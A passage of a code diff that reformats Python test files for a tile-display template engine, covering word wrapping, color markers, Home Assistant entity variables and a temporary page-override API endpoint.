                     assert closing != -1, f"Unclosed brace at position {i} in line: {line}"
                     # Verify the content between is valid (digits 63-70 or color name)
-                    content = line[i + 1:closing]
-                    assert content.isdigit() or content.lower() in COLOR_CODES or content.startswith("/"), \
+                    content = line[i + 1 : closing]
+                    assert content.isdigit() or content.lower() in COLOR_CODES or content.startswith("/"), (
                         f"Invalid color marker content: {content} in line: {line}"
+                    )
                     i = closing + 1
                 elif line[i] == "}":
                     # Should not have a closing brace without an opening
-                    assert False, f"Closing brace without opening at position {i} in line: {line}"
+                    raise AssertionError(f"Closing brace without opening at position {i} in line: {line}")
                 else:
                     i += 1
-    
+
     def test_color_blocks_with_text_wrap(self, engine):
         """Test wrapping color blocks mixed with text."""
         # Mix of color blocks and text
         text = "{67}" * 30 + "HELLO" + "{66}" * 30
-        
+
         wrapped = engine._word_wrap_tiles(text, first_width=22, subsequent_width=22, max_lines=5)
-        
+
         # Verify all color markers are intact
         full_text = "".join(wrapped)
         # Count braces should match
         assert full_text.count("{") == full_text.count("}")
-        
+
         # Verify no partial markers
         for line in wrapped:
             open_count = line.count("{")
@@ -999,18 +986,13 @@ class TestCompoundPluginKeys:
         # Confirm the call used the base id (not the compound key)
         call_args = mock_cm.get_color_rules.call_args
         assert call_args is not None, "_get_color_for_value did not call get_color_rules"
-        assert call_args[0][0] == "weather", (
-            f"Expected base plugin id 'weather' but got '{call_args[0][0]}'"
-        )
+        assert call_args[0][0] == "weather", f"Expected base plugin id 'weather' but got '{call_args[0][0]}'"
 
     def test_compound_key_color_only_uses_base_id(self, engine):
         """_get_color_only also resolves color rules via the base plugin id."""
         mock_cm = Mock()
-        mock_cm.get_color_rules.return_value = [
-            {"condition": ">", "value": 0, "color": "green"}
-        ]
+        mock_cm.get_color_rules.return_value = [{"condition": ">", "value": 0, "color": "green"}]
         engine._config_manager = mock_cm
         context = {"weather:sf": {"change_percent": 5}}
         engine._get_color_only("weather:sf", "change_percent", context)
         mock_cm.get_color_rules.assert_called_with("weather", "change_percent")
-

--- a/tests/test_templates_extended.py
+++ b/tests/test_templates_extended.py
@@ -1,7 +1,8 @@
 """Extended tests for template engine - covering additional code paths."""
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 
 from src.templates.engine import (
     TemplateEngine,
@@ -20,10 +21,10 @@ def engine():
 # Init / Singleton / Cache (lines 107-109, 113-116, 121-124, 1467-1469)
 # ---------------------------------------------------------------------------
 
-class TestInitAndSingleton:
 
+class TestInitAndSingleton:
     def test_init_failure_raises_runtime_error(self):
-        with patch('src.templates.engine.get_plugin_registry', side_effect=Exception("boom")):
+        with patch("src.templates.engine.get_plugin_registry", side_effect=Exception("boom")):
             with pytest.raises(RuntimeError, match="Plugin system is required"):
                 TemplateEngine()
 
@@ -43,6 +44,7 @@ class TestInitAndSingleton:
 
     def test_get_template_engine_creates_singleton(self):
         import src.templates.engine as mod
+
         original = mod._template_engine
         try:
             mod._template_engine = None
@@ -54,6 +56,7 @@ class TestInitAndSingleton:
 
     def test_reset_template_engine_resets_cache(self):
         import src.templates.engine as mod
+
         original = mod._template_engine
         try:
             eng = TemplateEngine()
@@ -66,6 +69,7 @@ class TestInitAndSingleton:
 
     def test_reset_template_engine_when_none_is_safe(self):
         import src.templates.engine as mod
+
         original = mod._template_engine
         try:
             mod._template_engine = None
@@ -78,8 +82,8 @@ class TestInitAndSingleton:
 # _count_tiles (lines 190-198)
 # ---------------------------------------------------------------------------
 
-class TestCountTiles:
 
+class TestCountTiles:
     def test_regular_chars(self, engine):
         assert engine._count_tiles("ABC") == 3
 
@@ -104,8 +108,8 @@ class TestCountTiles:
 # _truncate_to_tiles (lines 224-245)
 # ---------------------------------------------------------------------------
 
-class TestTruncateToTiles:
 
+class TestTruncateToTiles:
     def test_truncate_plain_text(self, engine):
         assert engine._truncate_to_tiles("ABCDEF", 3) == "ABC"
 
@@ -126,8 +130,8 @@ class TestTruncateToTiles:
 # _word_wrap (lines 433-468)
 # ---------------------------------------------------------------------------
 
-class TestWordWrap:
 
+class TestWordWrap:
     def test_empty_text(self, engine):
         assert engine._word_wrap("", 22, 22, 3) == [""]
 
@@ -155,8 +159,8 @@ class TestWordWrap:
 # _split_into_tokens (lines 497-506)
 # ---------------------------------------------------------------------------
 
-class TestSplitIntoTokens:
 
+class TestSplitIntoTokens:
     def test_plain_chars(self, engine):
         assert engine._split_into_tokens("ABC") == ["A", "B", "C"]
 
@@ -179,8 +183,8 @@ class TestSplitIntoTokens:
 #                   673, 677)
 # ---------------------------------------------------------------------------
 
-class TestWordWrapTiles:
 
+class TestWordWrapTiles:
     def test_empty_text(self, engine):
         assert engine._word_wrap_tiles("", 22, 22, 3) == [""]
 
@@ -233,8 +237,8 @@ class TestWordWrapTiles:
 # _render_with_wrap (lines 362-419)
 # ---------------------------------------------------------------------------
 
-class TestRenderWithWrap:
 
+class TestRenderWithWrap:
     def test_variable_level_wrap(self, engine):
         context = {"test": {"long": "A B C D E F G H I J K"}}
         result = engine._render_with_wrap("{{test.long|wrap}}", context, max_lines=3)
@@ -253,9 +257,7 @@ class TestRenderWithWrap:
 
     def test_line_level_wrap(self, engine):
         context = {"test": {"val": "SHORT"}}
-        result = engine._render_with_wrap(
-            "{{test.val}} some extra text here now", context, max_lines=2
-        )
+        result = engine._render_with_wrap("{{test.val}} some extra text here now", context, max_lines=2)
         assert len(result) >= 1
 
 
@@ -263,27 +265,27 @@ class TestRenderWithWrap:
 # render_lines with wrap (lines 295-319)
 # ---------------------------------------------------------------------------
 
-class TestRenderLinesWrap:
 
+class TestRenderLinesWrap:
     def test_wrap_prefix(self, engine):
         context = {"test": {"val": "A B C D E F G H I J K L M"}}
         lines = ["{wrap}{{test.val}}", "", "", "", "", ""]
         result = engine.render_lines(lines, context)
-        output = result.split('\n')
+        output = result.split("\n")
         assert len(output) == 6
 
     def test_wrap_respects_non_empty_boundary(self, engine):
         context = {"test": {"val": "A B C D E F G H I J K L M N O P Q R"}}
         lines = ["{wrap}{{test.val}}", "", "FIXED", "", "", ""]
         result = engine.render_lines(lines, context)
-        output = result.split('\n')
+        output = result.split("\n")
         assert "FIXED" in output[2]
 
     def test_pipe_wrap_filter_in_lines(self, engine):
         context = {"test": {"val": "A B C D E F G H I J K L M"}}
         lines = ["{{test.val|wrap}}", "", "", "", "", ""]
         result = engine.render_lines(lines, context)
-        assert len(result.split('\n')) == 6
+        assert len(result.split("\n")) == 6
 
 
 # ---------------------------------------------------------------------------
@@ -296,8 +298,8 @@ class TestRenderLinesWrap:
 # (preserving the existing test_wrap_respects_non_empty_boundary contract).
 # ---------------------------------------------------------------------------
 
-class TestRenderLinesWrapRegion:
 
+class TestRenderLinesWrapRegion:
     def test_wrap_region_consecutive_wrap_lines_merge(self, engine):
         """wrap=true on rows 0,1,2 each with non-empty content; row 3 is the
         non-wrap boundary 'BOUNDARY'. Existing engine breaks at row 1's
@@ -315,7 +317,7 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         # Rows 0-2 must be word-bounded fragments from the value (no PLACEHOLDER
         # leftovers because wrap clobbers wrap-region members).
         value_tokens = context["test"]["val"].split()
@@ -325,9 +327,7 @@ class TestRenderLinesWrapRegion:
                 f"Row {row_idx} kept its placeholder; wrap region didn't merge: {output}"
             )
             for tok in row_tokens:
-                assert tok in value_tokens, (
-                    f"Row {row_idx} token {tok!r} is not a whole word from source: {output}"
-                )
+                assert tok in value_tokens, f"Row {row_idx} token {tok!r} is not a whole word from source: {output}"
         # Wrap must have produced content on at least 2 rows (otherwise the
         # value fit in one row and we proved nothing).
         non_empty_in_region = sum(1 for r in output[:3] if r.strip())
@@ -348,7 +348,7 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         # Row 0 must be word-bounded (NOT mid-word "A TOURIST BOAT CAPSIZE")
         # Row 1 must still contain the tile decoration
         row0 = output[0].rstrip()
@@ -356,8 +356,7 @@ class TestRenderLinesWrapRegion:
         value_tokens = context["test"]["val"].split()
         for tok in row0_tokens:
             assert tok in value_tokens, (
-                f"Row 0 token {tok!r} is mid-word truncation; expected whole-word boundary. "
-                f"Full row: {row0!r}"
+                f"Row 0 token {tok!r} is mid-word truncation; expected whole-word boundary. Full row: {row0!r}"
             )
         # And row 1 should still have the tile codes (decoration not clobbered)
         assert "{63}" in output[1], f"Row 1 decoration was clobbered: {output[1]!r}"
@@ -380,12 +379,10 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         assert "FIXED" in output[2], f"FIXED was clobbered: {output}"
         # PLACEHOLDER must be gone from row 1 (wrap extended into wrap=True row)
-        assert "PLACEHOLDER" not in output[1], (
-            f"PLACEHOLDER still on row 1; wrap region didn't extend: {output[1]!r}"
-        )
+        assert "PLACEHOLDER" not in output[1], f"PLACEHOLDER still on row 1; wrap region didn't extend: {output[1]!r}"
         # Row 1 should contain wrap overflow.
         value_tokens = context["test"]["val"].split()
         row1_tokens = output[1].split()
@@ -406,18 +403,14 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata, device_type="note")
-        output = result.split('\n')
+        output = result.split("\n")
         assert len(output) == 3
         for row in output:
             assert len(row) <= 15, f"Row exceeds Note width: {row!r}"
-        assert "PLACEHOLDER" not in output[1], (
-            f"PLACEHOLDER survived wrap region on Note device: {output[1]!r}"
-        )
+        assert "PLACEHOLDER" not in output[1], f"PLACEHOLDER survived wrap region on Note device: {output[1]!r}"
         value_tokens = context["test"]["val"].split()
         row1_tokens = output[1].split()
-        assert any(tok in value_tokens for tok in row1_tokens), (
-            f"Wrap did not expand on Note device: {output}"
-        )
+        assert any(tok in value_tokens for tok in row1_tokens), f"Wrap did not expand on Note device: {output}"
 
     def test_wrap_on_last_line(self, engine):
         """Wrap on the final row with no rows below: single word-bounded line, no exception."""
@@ -432,15 +425,13 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": True},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         assert len(output) == 6
         # Row 5 should be word-bounded
         row5_tokens = output[5].split()
         value_tokens = context["test"]["val"].split()
         for tok in row5_tokens:
-            assert tok in value_tokens, (
-                f"Last-line wrap produced mid-word truncation: {output[5]!r}"
-            )
+            assert tok in value_tokens, f"Last-line wrap produced mid-word truncation: {output[5]!r}"
 
     def test_wrap_region_empty_wrap_line_does_not_pull_content_up(self, engine):
         """wrap=true on rows 0+1, content only on row 1: row 0 stays empty."""
@@ -455,7 +446,7 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         # Row 0 stays blank (just padding), row 1 has the value
         assert output[0].strip() == "", f"Row 0 should be empty: {output[0]!r}"
         assert "HELLO" in output[1], f"Row 1 should contain value: {output[1]!r}"
@@ -471,11 +462,9 @@ class TestRenderLinesWrapRegion:
         lines = ["{wrap}{{test.val}}", "{wrap}PLACEHOLDER", "FIXED", "", "", ""]
         # No line_metadata: forces _extract_alignment to populate wraps[]
         result = engine.render_lines(lines, context)
-        output = result.split('\n')
+        output = result.split("\n")
         assert "FIXED" in output[2], f"FIXED clobbered: {output}"
-        assert "PLACEHOLDER" not in output[1], (
-            f"PLACEHOLDER survived wrap region (legacy path): {output[1]!r}"
-        )
+        assert "PLACEHOLDER" not in output[1], f"PLACEHOLDER survived wrap region (legacy path): {output[1]!r}"
         value_tokens = context["test"]["val"].split()
         row1_tokens = output[1].split()
         assert any(tok in value_tokens for tok in row1_tokens), (
@@ -491,18 +480,16 @@ class TestRenderLinesWrapRegion:
         lines = ["{{test.val|wrap}}", "PLACEHOLDER", "FIXED", "", "", ""]
         metadata = [
             {"alignment": "left", "wrap": False},  # has_wrap from |wrap filter
-            {"alignment": "left", "wrap": True},   # extends region (non-empty content)
+            {"alignment": "left", "wrap": True},  # extends region (non-empty content)
             {"alignment": "left", "wrap": False},  # hard boundary
             {"alignment": "left", "wrap": False},
             {"alignment": "left", "wrap": False},
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         assert "FIXED" in output[2], f"FIXED clobbered: {output}"
-        assert "PLACEHOLDER" not in output[1], (
-            f"PLACEHOLDER survived |wrap region: {output[1]!r}"
-        )
+        assert "PLACEHOLDER" not in output[1], f"PLACEHOLDER survived |wrap region: {output[1]!r}"
         value_tokens = context["test"]["val"].split()
         row1_tokens = output[1].split()
         assert any(tok in value_tokens for tok in row1_tokens), (
@@ -525,13 +512,11 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         # Wrap should have expanded into row 1 because plugin.maybe renders to ""
         value_tokens = context["test"]["val"].split()
         row1_tokens = output[1].split()
-        assert any(tok in value_tokens for tok in row1_tokens), (
-            f"Wrap did not flow into rendered-empty line: {output}"
-        )
+        assert any(tok in value_tokens for tok in row1_tokens), f"Wrap did not flow into rendered-empty line: {output}"
 
     def test_wrap_region_blocked_by_rendered_visible_line(self, engine):
         """Row 1 is {{plugin.label}} where label = 'FOOTER': region stops at row 0."""
@@ -549,24 +534,22 @@ class TestRenderLinesWrapRegion:
             {"alignment": "left", "wrap": False},
         ]
         result = engine.render_lines(lines, context, line_metadata=metadata)
-        output = result.split('\n')
+        output = result.split("\n")
         # Row 1 should still show "FOOTER" (rendered-visible content blocks the region)
         assert "FOOTER" in output[1], f"FOOTER was clobbered: {output[1]!r}"
         # And row 0 must be word-bounded (budget=1 with word-wrapping)
         row0_tokens = output[0].split()
         value_tokens = context["test"]["val"].split()
         for tok in row0_tokens:
-            assert tok in value_tokens, (
-                f"Row 0 token {tok!r} is mid-word truncation: {output[0]!r}"
-            )
+            assert tok in value_tokens, f"Row 0 token {tok!r} is mid-word truncation: {output[0]!r}"
 
 
 # ---------------------------------------------------------------------------
 # render with context=None (line 146)
 # ---------------------------------------------------------------------------
 
-class TestRenderContextNone:
 
+class TestRenderContextNone:
     def test_render_builds_context_when_none(self, engine):
         result = engine.render("Hello", context=None)
         assert "Hello" in result
@@ -580,8 +563,8 @@ class TestRenderContextNone:
 # Variable edge cases (lines 717-720, 724, 863-864, 976-991, 995)
 # ---------------------------------------------------------------------------
 
-class TestVariableEdgeCases:
 
+class TestVariableEdgeCases:
     def test_single_part_returns_error(self, engine):
         result = engine.render("{{noperiod}}", context={})
         assert "???" in result
@@ -600,11 +583,11 @@ class TestVariableEdgeCases:
 
     def test_fill_space_variable(self, engine):
         result = engine.render("{{fill_space}}", context={})
-        assert '\x00FILL_SPACE\x00' in result
+        assert "\x00FILL_SPACE\x00" in result
 
     def test_fill_space_repeat_variable(self, engine):
         result = engine.render("{{fill_space_repeat:-}}", context={})
-        assert '\x00FILL_SPACE_REPEAT:-\x00' in result
+        assert "\x00FILL_SPACE_REPEAT:-\x00" in result
 
     def test_array_access_by_index(self, engine):
         context = {"test": {"items": ["A", "B", "C"]}}
@@ -628,204 +611,83 @@ class TestVariableEdgeCases:
 # Home Assistant entity handling (lines 880-945)
 # ---------------------------------------------------------------------------
 
-class TestHomeAssistantVariables:
 
+class TestHomeAssistantVariables:
     def test_entity_state(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temperature": {"state": "72", "attributes": {}}
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor_temperature.state}}", context
-        ) == "72"
+        context = {"home_assistant": {"sensor.temperature": {"state": "72", "attributes": {}}}}
+        assert engine.render("{{home_assistant.sensor_temperature.state}}", context) == "72"
 
     def test_entity_attribute(self, engine):
         context = {
-            "home_assistant": {
-                "sensor.temperature": {
-                    "state": "72",
-                    "attributes": {"unit_of_measurement": "F"}
-                }
-            }
+            "home_assistant": {"sensor.temperature": {"state": "72", "attributes": {"unit_of_measurement": "F"}}}
         }
-        assert engine.render(
-            "{{home_assistant.sensor_temperature.unit_of_measurement}}", context
-        ) == "F"
+        assert engine.render("{{home_assistant.sensor_temperature.unit_of_measurement}}", context) == "F"
 
     def test_entity_not_found(self, engine):
         context = {"home_assistant": {}}
-        assert "???" in engine.render(
-            "{{home_assistant.sensor_missing.state}}", context
-        )
+        assert "???" in engine.render("{{home_assistant.sensor_missing.state}}", context)
 
     def test_attribute_not_found(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temperature": {"state": "72", "attributes": {}}
-            }
-        }
-        assert "???" in engine.render(
-            "{{home_assistant.sensor_temperature.nonexistent}}", context
-        )
+        context = {"home_assistant": {"sensor.temperature": {"state": "72", "attributes": {}}}}
+        assert "???" in engine.render("{{home_assistant.sensor_temperature.nonexistent}}", context)
 
     def test_multi_underscore_domain(self, engine):
         context = {
-            "home_assistant": {
-                "media_player.living_room": {
-                    "state": "playing",
-                    "attributes": {"media_title": "Song"}
-                }
-            }
+            "home_assistant": {"media_player.living_room": {"state": "playing", "attributes": {"media_title": "Song"}}}
         }
-        assert engine.render(
-            "{{home_assistant.media_player_living_room.state}}", context
-        ) == "playing"
+        assert engine.render("{{home_assistant.media_player_living_room.state}}", context) == "playing"
 
     def test_boolean_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "switch.light": {
-                    "state": "on",
-                    "attributes": {"is_on": True}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.switch_light.is_on}}", context
-        ) == "Yes"
+        context = {"home_assistant": {"switch.light": {"state": "on", "attributes": {"is_on": True}}}}
+        assert engine.render("{{home_assistant.switch_light.is_on}}", context) == "Yes"
 
     def test_boolean_false_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "switch.light": {
-                    "state": "off",
-                    "attributes": {"is_on": False}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.switch_light.is_on}}", context
-        ) == "No"
+        context = {"home_assistant": {"switch.light": {"state": "off", "attributes": {"is_on": False}}}}
+        assert engine.render("{{home_assistant.switch_light.is_on}}", context) == "No"
 
     def test_numeric_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "72",
-                    "attributes": {"current": 72.5}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor_temp.current}}", context
-        ) == "72.5"
+        context = {"home_assistant": {"sensor.temp": {"state": "72", "attributes": {"current": 72.5}}}}
+        assert engine.render("{{home_assistant.sensor_temp.current}}", context) == "72.5"
 
     def test_integer_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "72",
-                    "attributes": {"current": 72.0}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor_temp.current}}", context
-        ) == "72"
+        context = {"home_assistant": {"sensor.temp": {"state": "72", "attributes": {"current": 72.0}}}}
+        assert engine.render("{{home_assistant.sensor_temp.current}}", context) == "72"
 
     def test_none_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "unknown",
-                    "attributes": {"current": None}
-                }
-            }
-        }
-        assert "???" in engine.render(
-            "{{home_assistant.sensor_temp.current}}", context
-        )
+        context = {"home_assistant": {"sensor.temp": {"state": "unknown", "attributes": {"current": None}}}}
+        assert "???" in engine.render("{{home_assistant.sensor_temp.current}}", context)
 
     def test_no_underscore_entity(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor": {"state": "ok", "attributes": {}}
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor.state}}", context
-        ) == "ok"
+        context = {"home_assistant": {"sensor": {"state": "ok", "attributes": {}}}}
+        assert engine.render("{{home_assistant.sensor.state}}", context) == "ok"
 
     def test_top_level_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "72",
-                    "last_updated": "2024-01-01",
-                    "attributes": {}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor_temp.last_updated}}", context
-        ) == "2024-01-01"
+        context = {"home_assistant": {"sensor.temp": {"state": "72", "last_updated": "2024-01-01", "attributes": {}}}}
+        assert engine.render("{{home_assistant.sensor_temp.last_updated}}", context) == "2024-01-01"
 
     def test_top_level_bool_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "72",
-                    "is_available": True,
-                    "attributes": {}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor_temp.is_available}}", context
-        ) == "Yes"
+        context = {"home_assistant": {"sensor.temp": {"state": "72", "is_available": True, "attributes": {}}}}
+        assert engine.render("{{home_assistant.sensor_temp.is_available}}", context) == "Yes"
 
     def test_top_level_numeric_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "72",
-                    "battery": 85.0,
-                    "attributes": {}
-                }
-            }
-        }
-        assert engine.render(
-            "{{home_assistant.sensor_temp.battery}}", context
-        ) == "85"
+        context = {"home_assistant": {"sensor.temp": {"state": "72", "battery": 85.0, "attributes": {}}}}
+        assert engine.render("{{home_assistant.sensor_temp.battery}}", context) == "85"
 
     def test_top_level_none_attribute(self, engine):
-        context = {
-            "home_assistant": {
-                "sensor.temp": {
-                    "state": "72",
-                    "friendly_name": None,
-                    "attributes": {}
-                }
-            }
-        }
-        assert "???" in engine.render(
-            "{{home_assistant.sensor_temp.friendly_name}}", context
-        )
+        context = {"home_assistant": {"sensor.temp": {"state": "72", "friendly_name": None, "attributes": {}}}}
+        assert "???" in engine.render("{{home_assistant.sensor_temp.friendly_name}}", context)
 
     def test_fallback_first_underscore_replace(self, engine):
         context = {"home_assistant": {}}
-        assert "???" in engine.render(
-            "{{home_assistant.nonexistent_entity.state}}", context
-        )
+        assert "???" in engine.render("{{home_assistant.nonexistent_entity.state}}", context)
 
 
 # ---------------------------------------------------------------------------
 # _color suffix (lines 952-955)
 # ---------------------------------------------------------------------------
 
-class TestColorSuffix:
 
+class TestColorSuffix:
     def test_color_suffix_no_rules(self, engine):
         context = {"test": {"temperature": 72}}
         result = engine.render("{{test.temperature_color}}", context)
@@ -836,8 +698,8 @@ class TestColorSuffix:
 # _evaluate_condition (lines 805-836)
 # ---------------------------------------------------------------------------
 
-class TestEvaluateCondition:
 
+class TestEvaluateCondition:
     def test_greater_than(self, engine):
         assert engine._evaluate_condition(10, ">", 5) is True
         assert engine._evaluate_condition(5, ">", 10) is False
@@ -878,8 +740,8 @@ class TestEvaluateCondition:
 # _get_color_for_value (lines 763-792)
 # ---------------------------------------------------------------------------
 
-class TestGetColorForValue:
 
+class TestGetColorForValue:
     def test_no_dot_returns_empty(self, engine):
         assert engine._get_color_for_value("nodot", {}) == ""
 
@@ -921,9 +783,7 @@ class TestGetColorForValue:
         engine._config_manager = mock_config
 
         mock_manifest = Mock()
-        mock_manifest.color_rules_schema = {
-            "aqi": {"default_rules": [{"condition": ">", "value": 50, "color": "red"}]}
-        }
+        mock_manifest.color_rules_schema = {"aqi": {"default_rules": [{"condition": ">", "value": 50, "color": "red"}]}}
         engine._plugin_registry = Mock()
         engine._plugin_registry.get_manifest.return_value = mock_manifest
 
@@ -944,13 +804,11 @@ class TestGetColorForValue:
 # _get_color_only (lines 1014-1050)
 # ---------------------------------------------------------------------------
 
-class TestGetColorOnly:
 
+class TestGetColorOnly:
     def test_returns_color_tile(self, engine):
         mock_config = Mock()
-        mock_config.get_color_rules.return_value = [
-            {"condition": ">=", "value": 0, "color": "green"}
-        ]
+        mock_config.get_color_rules.return_value = [{"condition": ">=", "value": 0, "color": "green"}]
         engine._config_manager = mock_config
         context = {"test": {"val": 10}}
         assert engine._get_color_only("test", "val", context) == "{66}"
@@ -965,9 +823,7 @@ class TestGetColorOnly:
 
     def test_null_raw_value_returns_empty(self, engine):
         mock_config = Mock()
-        mock_config.get_color_rules.return_value = [
-            {"condition": ">", "value": 0, "color": "red"}
-        ]
+        mock_config.get_color_rules.return_value = [{"condition": ">", "value": 0, "color": "red"}]
         engine._config_manager = mock_config
         context = {"test": {}}
         assert engine._get_color_only("test", "val", context) == ""
@@ -1001,8 +857,8 @@ class TestGetColorOnly:
 # _map_field_for_data_lookup (lines 1067-1070)
 # ---------------------------------------------------------------------------
 
-class TestMapFieldForDataLookup:
 
+class TestMapFieldForDataLookup:
     def test_weather_temp_maps_to_temperature(self, engine):
         assert engine._map_field_for_data_lookup("weather", "temp") == "temperature"
 
@@ -1015,8 +871,8 @@ class TestMapFieldForDataLookup:
 # Filter edge cases (lines 1087-1088, 1094-1097)
 # ---------------------------------------------------------------------------
 
-class TestFilterEdgeCases:
 
+class TestFilterEdgeCases:
     def test_pad_invalid_arg(self, engine):
         assert engine._apply_filter("hello", "pad:abc") == "hello"
 
@@ -1036,8 +892,8 @@ class TestFilterEdgeCases:
 # _normalize_colors (line 1120)
 # ---------------------------------------------------------------------------
 
-class TestNormalizeColors:
 
+class TestNormalizeColors:
     def test_named_color_to_numeric(self, engine):
         assert engine._normalize_colors("{{red}}") == "{63}"
 
@@ -1052,8 +908,8 @@ class TestNormalizeColors:
 # _extract_alignment with wrap (lines 1141-1142)
 # ---------------------------------------------------------------------------
 
-class TestExtractAlignmentWrap:
 
+class TestExtractAlignmentWrap:
     def test_wrap_prefix_detected(self, engine):
         alignment, wrap_enabled, content = engine._extract_alignment("{wrap}Hello")
         assert wrap_enabled is True
@@ -1071,8 +927,8 @@ class TestExtractAlignmentWrap:
 # _build_context with no registry (line 688)
 # ---------------------------------------------------------------------------
 
-class TestBuildContextNoRegistry:
 
+class TestBuildContextNoRegistry:
     def test_no_registry_returns_empty(self, engine):
         engine._plugin_registry = None
         assert engine._build_context() == {}
@@ -1082,8 +938,8 @@ class TestBuildContextNoRegistry:
 # Methods with no registry (lines 1266, 1275-1277, 1336, 1417, 1433)
 # ---------------------------------------------------------------------------
 
-class TestNoRegistryPaths:
 
+class TestNoRegistryPaths:
     def test_get_available_variables_empty(self, engine):
         engine._plugin_registry = None
         assert engine.get_available_variables() == {}
@@ -1109,8 +965,8 @@ class TestNoRegistryPaths:
 # strip_formatting (lines 1442-1445)
 # ---------------------------------------------------------------------------
 
-class TestStripFormatting:
 
+class TestStripFormatting:
     def test_removes_unresolved_variables(self, engine):
         assert engine.strip_formatting("Hello {{world}}") == "Hello "
 
@@ -1125,10 +981,10 @@ class TestStripFormatting:
 # fill_space repeat patterns (line 1240, 1250)
 # ---------------------------------------------------------------------------
 
-class TestFillSpaceRepeat:
 
+class TestFillSpaceRepeat:
     def test_repeat_dash(self, engine):
-        marker = '\x00FILL_SPACE_REPEAT:-\x00'
+        marker = "\x00FILL_SPACE_REPEAT:-\x00"
         result = engine._process_fill_space(f"A{marker}B", width=10)
         assert result.startswith("A")
         assert result.endswith("B")
@@ -1136,14 +992,14 @@ class TestFillSpaceRepeat:
         assert "--------" in result
 
     def test_repeat_color(self, engine):
-        marker = '\x00FILL_SPACE_REPEAT:blue\x00'
+        marker = "\x00FILL_SPACE_REPEAT:blue\x00"
         result = engine._process_fill_space(f"A{marker}B", width=6)
         assert result.startswith("A")
         assert result.endswith("B")
         assert "{67}" in result
 
     def test_repeat_multi_char_pattern(self, engine):
-        marker = '\x00FILL_SPACE_REPEAT:=-\x00'
+        marker = "\x00FILL_SPACE_REPEAT:=-\x00"
         result = engine._process_fill_space(f"A{marker}B", width=10)
         assert result.startswith("A")
         assert result.endswith("B")
@@ -1154,8 +1010,8 @@ class TestFillSpaceRepeat:
 # _calculate_max_line_length (lines 1356, 1399-1400)
 # ---------------------------------------------------------------------------
 
-class TestCalculateMaxLineLength:
 
+class TestCalculateMaxLineLength:
     def test_wrap_filter_returns_22(self, engine):
         assert engine._calculate_max_line_length("{{test.val|wrap}}") == 22
 

--- a/tests/test_temporary_override.py
+++ b/tests/test_temporary_override.py
@@ -3,7 +3,8 @@
 Uses FastAPI TestClient and mocks the SettingsService + PageService singletons
 so no real filesystem or board connection is needed.
 """
-from datetime import datetime, timezone, timedelta
+
+from datetime import UTC, datetime, timedelta
 from unittest.mock import MagicMock, patch
 
 import pytest
@@ -12,10 +13,10 @@ from fastapi.testclient import TestClient
 from src.api_server import app
 from src.settings.service import SettingsService, TemporaryOverride
 
-
 # ---------------------------------------------------------------------------
 # Fixtures
 # ---------------------------------------------------------------------------
+
 
 @pytest.fixture
 def tmp_settings_file(tmp_path):
@@ -59,6 +60,7 @@ def client_with_page(settings_service, tmp_path):
 # GET /settings/temporary-override
 # ---------------------------------------------------------------------------
 
+
 class TestGetTemporaryOverride:
     def test_returns_inactive_when_no_override(self, client):
         r = client.get("/settings/temporary-override")
@@ -72,7 +74,7 @@ class TestGetTemporaryOverride:
         assert data["revert_page_id"] is None
 
     def test_returns_active_when_override_set(self, client, settings_service):
-        expires = (datetime.now(timezone.utc) + timedelta(minutes=10)).isoformat()
+        expires = (datetime.now(UTC) + timedelta(minutes=10)).isoformat()
         settings_service.set_temporary_override(
             TemporaryOverride(page_id="p1", expires_at=expires, revert_mode="schedule")
         )
@@ -86,11 +88,9 @@ class TestGetTemporaryOverride:
         assert data["remaining_seconds"] > 0
 
     def test_returns_inactive_when_override_expired(self, client, settings_service):
-        past = (datetime.now(timezone.utc) - timedelta(minutes=1)).isoformat()
+        past = (datetime.now(UTC) - timedelta(minutes=1)).isoformat()
         # Set directly without the auto-clear logic on get
-        settings_service._temporary_override = TemporaryOverride(
